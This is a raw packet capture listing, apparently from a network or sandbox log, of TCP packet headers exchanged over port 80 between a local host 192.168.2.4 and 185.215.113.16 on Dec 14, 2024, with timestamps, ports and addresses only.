Dec 14, 2024 23:58:38.471052885 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.471111059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.471191883 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.471446037 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.472094059 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.472176075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.472193956 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.472238064 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.473120928 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.473169088 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.473257065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.473299980 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.474138975 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.474195004 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.474273920 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.474474907 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.475168943 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.475223064 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.475265980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.475310087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.476147890 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.476203918 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.476269960 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.476454973 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.477149010 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.477201939 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.477278948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.477412939 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.478159904 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.478239059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.478305101 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.478348970 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.479165077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.479207039 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.479288101 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.479335070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.480195045 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.480309010 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.480341911 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.480389118 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.481230021 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.481276989 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.481334925 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.481493950 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.482218027 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.482276917 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.482356071 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.482424974 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.483232975 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.483282089 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.483378887 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.483422995 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.484255075 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.484299898 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.484379053 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.484535933 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.485311031 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.485362053 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.485373974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.485424042 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.486285925 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.486330986 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.486414909 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.486465931 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.487301111 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.487344980 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.487426043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.487471104 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.627104998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.627335072 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.627399921 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.627500057 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.627549887 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.627778053 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.627824068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.628542900 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.628593922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.628693104 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.628741026 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.629549980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.629719019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.629770041 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.630604029 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.630651951 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.630765915 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.630810976 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.631572008 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.631619930 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.631700039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.631740093 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.632579088 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.632632971 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.632842064 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.632889032 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.633610964 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.633856058 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.633903980 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.634629011 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.634676933 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.634799957 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.634848118 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.635632038 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.635679007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.635797024 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.635843992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.636661053 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.636718035 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.636796951 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.636843920 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.637712002 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.637918949 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.637964964 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.638693094 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.638741016 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.638863087 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.638914108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.639703989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.639750957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.639858961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.639905930 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.640747070 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.640794992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.640876055 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.640919924 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.641737938 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.641942978 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.641987085 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.642760992 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.642808914 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.642906904 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.642955065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.643767118 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.643814087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.643891096 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.643938065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.644779921 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.644829988 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.644906044 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.644953012 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.645821095 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.645986080 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.646033049 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.646826029 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.646874905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.646951914 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.646997929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.647823095 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.647874117 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.647973061 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.648019075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.648844957 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.648890972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.649004936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.649049997 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.649920940 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.650151968 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.650198936 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.650907040 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.650955915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.651067019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.651117086 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.651897907 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.651947021 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.652080059 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.652126074 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.652899027 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.652945042 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.653070927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.653117895 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.653898954 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.654073954 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.654135942 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.654907942 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.654951096 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.655045033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.655086040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.655927896 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.655971050 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.656092882 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.656131983 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.656969070 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.657011986 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.657150984 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.657192945 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.657983065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.658129930 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.658173084 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.659010887 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.659054041 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.659107924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.659147978 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.660005093 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.660145998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.660187006 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.661037922 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.661155939 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.661202908 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.662019968 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.662173033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.662215948 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.663052082 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.663095951 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.663177967 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.663218021 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.664041996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.664083004 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.664218903 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.664262056 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.665055037 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.665097952 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.665196896 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.665239096 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.666322947 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.666368961 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.666451931 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.666495085 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.667114019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.667156935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.667289972 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.667336941 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.668128967 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.668174028 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.668299913 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.668344975 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.669123888 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.669168949 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.669320107 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.669363022 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.670146942 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.670192957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.670283079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.670327902 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.671190977 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.671235085 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.671336889 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.671380997 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.672172070 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.672214031 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.672302961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.672346115 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.673178911 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.673222065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.673346996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.673388958 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.674190998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.674235106 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.674392939 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.674436092 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.675223112 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.675298929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.675401926 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.675446987 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.676220894 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.676264048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.676394939 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.676436901 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.677301884 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.677345037 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.677419901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.677460909 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.678270102 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.678313017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.678417921 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.678458929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.679260969 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.679301977 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.679441929 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.679486036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.680248022 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.680291891 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.819164038 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.819277048 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.819307089 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.819360971 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.819586992 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.819715977 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.819850922 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.819895029 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.820640087 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.820794106 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.820847034 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.821646929 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.821799040 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.821851015 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.822643042 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.822688103 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.822812080 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.822854996 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.823654890 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.823700905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.823827982 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.823865891 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.824682951 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.824732065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.824822903 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.824865103 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.825706005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.825777054 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.825850010 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.825894117 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.826718092 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.826761961 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.826857090 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.827033997 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.827740908 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.827898026 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.828051090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.828754902 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.828809023 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.828968048 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.829015017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.829771996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.830020905 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.830066919 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.830775976 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.830821037 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.830971956 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.831015110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.831829071 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.831873894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.831967115 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.832004070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.832797050 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.832848072 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.832931995 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.832973003 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.833811998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.833967924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.834012032 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.834836960 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.834994078 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.835056067 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.835866928 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.835912943 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.836040020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.836086988 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.836864948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.836909056 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.837025881 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.837069035 CET	49841	80	192.168.2.4	185.215.113.16
